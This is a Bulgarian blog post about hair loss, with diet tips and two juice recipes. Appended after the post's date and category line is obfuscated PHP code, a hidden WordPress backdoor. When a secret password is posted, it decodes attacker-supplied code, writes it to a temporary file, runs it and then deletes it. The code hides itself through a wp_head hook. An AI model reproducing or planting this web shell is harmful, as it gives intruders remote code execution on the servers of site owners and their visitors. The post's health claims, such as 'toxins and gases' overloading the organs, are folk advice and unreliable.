Косопад и увредена коса – съвети и рецепти | Косопад

Косопад и увредена коса – съвети и рецепти

Ако храненето ви не е достатъчно богато на витамини и минерали, протеини и други вещества, косата, кожата и ноктите са първите, които го усещат.

kosopad-navici

Ако косата ви пада лесно или е увредена, най- вероятно начинът ви на хранене не е здравословен. Различните рецепти за маски и шампоаните не са достатъчни, ако не обърнете внимание на храната.

Предлагаме ви няколко съвета как да имате разкошна и здрава коса, а и няколко рецепти за сокове, които ще ви помогнат да получите необходимите вещества.

ИМА 3 ФАКТОРА, КОИТО ТРЯБВА ДА ИЗБЯГВАТЕ, ЗА ДА СЕ ХРАНИ ПРАВИЛНО КОСАТА ВИ

1. СТРЕСЪТ. Не позволява на веществата да се усвояват правилно. По този начин скалпът се стресира и пречи на хранителните вещества да стигнат до фоликула. Така косата отслабва и започва да пада.
2. НАТОВАРЕНИ ОРГАНИ. Вътрешните органи се натоварени със задачата да усвояват хранителните вещества, за да минат в кръвта, от където да се разпределят до всички органи. Когато обаче са претоварени от токсини и газове, не могат да си вършат правилно работата. За да не натоварваме органите, не трябва да ядем много мазно, захар, рафинирано брашно и др.
3. ЛОШО КРЪВООБРАЩЕНИЕ. Можете да го подобрите с повече движение и масажи на скалпа. Кръвта пренася веществата до косата, ако има проблеми с кръвообращението, няма да може да ги достави до корените на космите.sok-taliya-1

СОК ЗА ПОДХРАНВАНЕ КОСАТА И КОРЕНА

Съставки:
1 чаша мляко от овес или соя
1 с.л. сусам
½ с.л. слънчогледови семки
1 банан
Бирена мая или спирулина

Начин на приготвяне:

Направете всичко на сок. Изпийте го с малко бирена мая или спирулина.

СОК СРЕЩУ КОСОПАД

Съставки:
3 с.л. измит и накълцан магданоз
250 грама люцерна – растението или зародиши
1 лъжичка течен хлорофил
2 цели лимона с кората
Мелаза или мед

Начин на приготвяне:
1. Измийте и нарежете лимоните на парченца. Направете ги на сок и го сипете във водна чаша.
2. Прецедете водата и използвайте тази лимонова вода, за да направите на сок и останалите съставки. Пийте бавно на малки глътки.

27. май 2014 11:14:57 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}